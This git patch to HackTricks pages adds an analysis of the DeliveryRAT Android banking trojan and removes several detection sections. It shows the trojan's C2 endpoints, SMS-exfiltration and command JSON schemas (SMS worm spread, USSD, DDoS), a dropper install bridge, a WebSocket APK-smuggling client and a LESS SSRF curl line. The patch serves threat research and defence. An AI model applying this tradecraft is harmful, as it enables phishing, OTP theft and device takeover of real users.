From d59e46483b2f8a9a7f0b436749cf21f375127cd4 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Mon, 3 Nov 2025 19:09:51 +0000 Subject: [PATCH] Add content from: Delivery details: analysis of the new DeliveryRAT Android tr... --- .../mobile-phishing-malicious-apps.md | 159 ++++++++++++++---- .../css-injection/less-code-injection.md | 7 +- 2 files changed, 129 insertions(+), 37 deletions(-) diff --git a/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md b/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md index 7ca3e849fb4..b40d8cea328 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md @@ -54,15 +54,12 @@ * **Network Canary** – Configure `iptables -p tcp --dport 80 -j NFQUEUE` to detect unsolid POST bursts after code entry. * **mobileconfig Inspection** – Use `security cms -D -i profile.mobileconfig` on macOS to list `PayloadContent` and spot excessive entitlements. -## Blue-Team Detection Ideas - -* **Certificate Transparency / DNS Analytics** to catch sudden bursts of keyword-rich domains. -* **User-Agent & Path Regex**: `(?i)POST\s+/(check|upload)\.php` from Dalvik clients outside Google Play. -* **Invite-code Telemetry** – POST of 6–8 digit numeric codes shortly after APK install may indicate staging. -* **MobileConfig Signing** – Block unsigned configuration profiles via MDM policy. ## Useful Frida Snippet: Auto-Bypass Invitation Code +
+Frida: auto-bypass invitation code + ```python # frida -U -f com.badapp.android -l bypass.js --no-pause # Hook HttpURLConnection write to always return success @@ -82,14 +79,18 @@ Java.perform(function() { }); ``` +
+ + ## Indicators (Generic) -``` +```text /req/checkCode.php # invite code validation /upload.php # batched ZIP exfiltration LubanCompress 1.1.8 # "Luban" string inside classes.dex ``` + --- ## Android WebView Payment Phishing (UPI) – Dropper + FCM C2 Pattern @@ -119,7 +120,7 @@ zipgrep -i "classes|.apk" sample.apk | head Example (sanitised): -``` +```text GET https://rebrand.ly/dclinkto2 Response: https://sqcepo.replit.app/gate.html,https://sqcepo.replit.app/addsm.php Transform: "gate.html" → "gate.htm" (loaded in WebView) @@ -127,6 +128,7 @@ UPI credential POST: https://sqcepo.replit.app/addup.php SMS upload: https://sqcepo.replit.app/addsm.php ``` + Pseudo-code: ```java @@ -206,21 +208,6 @@ public void onMessageReceived(RemoteMessage msg){ } ``` -### Hunting patterns and IOCs -- APK contains secondary payload at `assets/app.apk` -- WebView loads payment from `gate.htm` and exfiltrates to `/addup.php` -- SMS exfiltration to `/addsm.php` -- Shortlink-driven config fetch (e.g., `rebrand.ly/*`) returning CSV endpoints -- Apps labelled as generic “Update/Secure Update” -- FCM `data` messages with a `_type` discriminator in untrusted apps - -### Detection & defence ideas -- Flag apps that instruct users to disable network during install and then side-load a second APK from `assets/`. -- Alert on the permission tuple: `READ_CONTACTS` + `READ_SMS` + `SEND_SMS` + WebView-based payment flows. -- Egress monitoring for `POST /addup.php|/addsm.php` on non-corporate hosts; block known infrastructure. -- Mobile EDR rules: untrusted app registering for FCM and branching on a `_type` field. - ---- ## Socket.IO/WebSocket-based APK Smuggling + Fake Google Play Pages @@ -228,6 +215,9 @@ Attackers increasingly replace static APK links with a Socket.IO/WebSocket chann Typical client flow observed in the wild: +
+Socket.IO smuggling client example + ```javascript // Open Socket.IO channel and request payload const socket = io("wss:///ws", { transports: ["websocket"] }); @@ -248,16 +238,14 @@ socket.on("downloadComplete", () => { }); ``` +
+ + Why it evades simple controls: - No static APK URL is exposed; payload is reconstructed in memory from WebSocket frames. - URL/MIME/extension filters that block direct .apk responses may miss binary data tunneled via WebSockets/Socket.IO. - Crawlers and URL sandboxes that don’t execute WebSockets won’t retrieve the payload. -Hunting and detection ideas: -- Web/network telemetry: flag WebSocket sessions that transfer large binary chunks followed by creation of a Blob with MIME application/vnd.android.package-archive and a programmatic `` click. Look for client strings like socket.emit('startDownload'), and events named chunk, downloadProgress, downloadComplete in page scripts. -- Play-store spoof heuristics: on non-Google domains serving Play-like pages, hunt for Google Play UI strings such as http.html:"VfPpkd-jY41G-V67aGc", mixed-language templates, and fake “verification/progress” flows driven by WS events. -- Controls: block APK delivery from non-Google origins; enforce MIME/extension policies that include WebSocket traffic; preserve browser safe-download prompts. - See also WebSocket tradecraft and tooling: {{#ref}} @@ -274,6 +262,9 @@ Attackers present a WebView pointing to an attacker page and inject a JavaScript Minimal pattern: +
+Dropper WebView install bridge (Java) + ```java public class DropperActivity extends Activity { @Override protected void onCreate(Bundle b){ @@ -303,6 +294,9 @@ public class DropperActivity extends Activity { } ``` +
+ + HTML on the page: ```html @@ -421,13 +415,107 @@ Background: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new - Comms/Recon: `update_device`, `send_sms`, `replace_buffer`, `get_name`, `add_contact` - NFC: `nfs`, `nfs_inject` -### Detection & defence ideas (RatOn-style) -- Hunt for WebViews with `addJavascriptInterface()` exposing installer/permission methods; pages ending in “/access” that trigger Accessibility prompts. -- Alert on apps that generate high-rate Accessibility gestures/clicks shortly after being granted service access; telemetry that resembles Accessibility node dumps sent to C2. -- Monitor Device Admin policy changes in untrusted apps: `lockNow`, password expiration, keyguard feature toggles. -- Alert on MediaProjection prompts from non-corporate apps followed by periodic frame uploads. -- Detect installation/launch of an external NFC-relay app triggered by another app. -- For banking: enforce out-of-band confirmations, biometrics-binding, and transaction-limits resistant to on-device automation. + +## DeliveryRAT – server‑driven phishing + OTP/notification interception + USSD + device‑sourced HTTP DDoS (Android) + +Threat pattern distilled from 2025 DeliveryRAT builds: a loader‑>payload sideload, aggressive runtime permissioning, a WebSocket/REST C2, server‑driven phishing Activities, SMS/contact abuse, USSD dialing, and an on‑device HTTP flooder. + +### Distribution and loader +- Small loader APK (e.g., `com.harry.loader`) embeds the RAT under `res/raw/` and shows a fake “Update” page. +- Tapping Update requests Install‑unknown‑apps permission, installs the embedded APK, and then launches it by package (payload family typically `com.delviskesyty.*`). +- Hides the obvious “download APK” flow and reduces friction; future runs start the payload by package name. + +### First‑run flow and permissions +- Prompts for Notification Listener and to ignore battery optimizations; starts a long‑lived `WebSocketService` and displays a server‑driven UI beginning with a “tracking number” input. +- Requests telephony/SMS perms depending on mode: `READ_SMS`, `RECEIVE_SMS`, `SEND_SMS`, `READ_PHONE_STATE`, `CALL_PHONE`; polls for `READ_PHONE_NUMBERS` and default‑SMS‑app status every ~5s. +- SIM/line metadata is posted to `/send-number`; the entered tracking number plus SIM info is posted to `/track-nomer` to drive next steps. +- Operating modes via config: `MODE="standart"` (full perms) vs `MODE="mini"` (low‑friction, primarily asks to become the default SMS handler to retain OTP interception). + +### Server‑driven phishing Activities (operator UI) +The C2 selects one of five Activities, providing texts/assets and the exfil endpoint: +- Card → collects cardholder/payment fields; POST `/send-card`. +- Custom → up to three arbitrary text inputs; POST `/send-custom`. +- Photo → requests `READ_MEDIA_IMAGES`/`READ_EXTERNAL_STORAGE`, lets user pick an image; POST `/send-photo`. +- Qr → shows a server‑provided QR bitmap and text; continues flow. +- Text → arbitrary text with confirm. +Lifecycle callbacks POST to `/open-app`, `/swap-app`, `/close-app` so operators can track progress. + +### Persistence and data‑capture components +- `NotificationListenerService`: forwards notification metadata/content to `/send-notification` and attempts to hide original notifications (conceals OTPs). +- `SmsReceiver`: ingests inbound SMS; rebroadcasts `ACTION_NEW_SMS` to `WebSocketService` for near‑real‑time exfil. +- `BootReceiver`: autostarts `WebSocketService` after boot. +- Service hardening: 1‑minute `AlarmManager` + ~15‑minute watchdog; foreground notification (benign‑looking) such as “Data Sync”; network change receiver for auto‑reconnect. + +### C2 over WebSocket + REST +- Device derives a HWID from `Settings.Secure.ANDROID_ID`; maintains a persistent WS channel and periodic HTTP POSTs to REST paths. +- SMS exfiltration payload includes device/SIM metadata, team/worker IDs and the victim “track number”. + +
+Example SMS exfil JSON (WebSocket) + +```json +{ + "Data": { + "message": "{sms_body}", + "sender": "{sender_phone}", + "messageId": "{sms_timestamp}", + "dateString": "{formatted_date}", + "hwid": "{android_id}", + "service": "{app_name}", + "teamId": "{team_id}", + "workerId": "{worker_id}", + "trackNumber": "{track_number}", + "deviceModel": "{Build.MODEL}", + "androidVersion": "{Build.VERSION.RELEASE}", + "type": "Новое смс", + "serviceCenter": "{sms_smsc}", + "operator": "{sim_operator}", + "phoneNumber": "{device_phone}" + } +} +``` + +
+ +- REST endpoints commonly observed (relative to the operator domain): `/send-number`, `/track-nomer`, `/send-card`, `/send-custom`, `/send-photo`, `/send-notification`, `/send-ussd`, `/send-answer`. + +### Remote command schema and behaviours +Generic command envelope (WS → device): + +```json +{ + "type": "{command}", + "number": "{number}", + "text": "{text}", + "useAlternativeIcon": "{bool}", + "target": "{ddos_url}", + "total": "{ddos_total_requests}", + "concurrency": "{parallel_requests}", + "photo": "{base64_qr_bitmap}" +} +``` + +Observed commands: +- `allSmsContact` (`text`): mass‑send arbitrary SMS to every unique contact (worm‑like spread). +- `call` / `callTwo` (`number`): dial arbitrary USSD; responses POSTed to `/send-ussd`. +- `card`, `custom`, `photo`, `qr`: launch the phishing Activities described above. +- `changeIcon` (`useAlternativeIcon`) and `hide`: stealth controls (alt icon, hide launcher entry). +- `oldsms`: dump existing SMS to a text file and exfil via `/send-answer`. +- DDoS: set `target` + `total` + `concurrency` to trigger a parallel HTTP flood from the handset. + +### Static config traits (typical keys) + +```json +{ + "API": "", + "APPLICATION_ID": "com.delviskesyty.{...}", + "MODE": "standart|mini", + "TEAM_ID": "{id}", + "WORKER_ID": "{id}", + "VERSION_NAME": "2.x" +} +``` + ## References @@ -440,5 +528,6 @@ Background: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new - [Banker Trojan Targeting Indonesian and Vietnamese Android Users (DomainTools)](https://dti.domaintools.com/banker-trojan-targeting-indonesian-and-vietnamese-android-users/) - [DomainTools SecuritySnacks – ID/VN Banker Trojans (IOCs)](https://github.com/DomainTools/SecuritySnacks/blob/main/2025/BankerTrojan-ID-VN) - [Socket.IO](https://socket.io) +- [Delivery details: analysis of the new DeliveryRAT Android trojan version (F6)](https://www.f6.ru/blog/android-deliveryrat-research/) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-web/xs-search/css-injection/less-code-injection.md b/src/pentesting-web/xs-search/css-injection/less-code-injection.md index b9d599deb30..6d338df2b68 100644 --- a/src/pentesting-web/xs-search/css-injection/less-code-injection.md +++ b/src/pentesting-web/xs-search/css-injection/less-code-injection.md @@ -1,4 +1,6 @@ -## LESS Code Injection leading to SSRF & Local File Read +# LESS Code Injection leading to SSRF & Local File Read + +{{#include ../../../banners/hacktricks-training.md}} LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful `@import` directive. During compilation the LESS engine will **fetch the resources referenced in `@import`** statements and embed ("inline") their contents into the resulting CSS when the `(inline)` option is used. @@ -59,4 +61,5 @@ curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \ * [SugarCRM ≤ 14.0.0 (css/preview) LESS Code Injection Vulnerability](https://karmainsecurity.com/KIS-2025-04) * [SugarCRM Security Advisory SA-2024-059](https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/) -* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258) \ No newline at end of file +* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258) +{{#include ../../../banners/hacktricks-training.md}}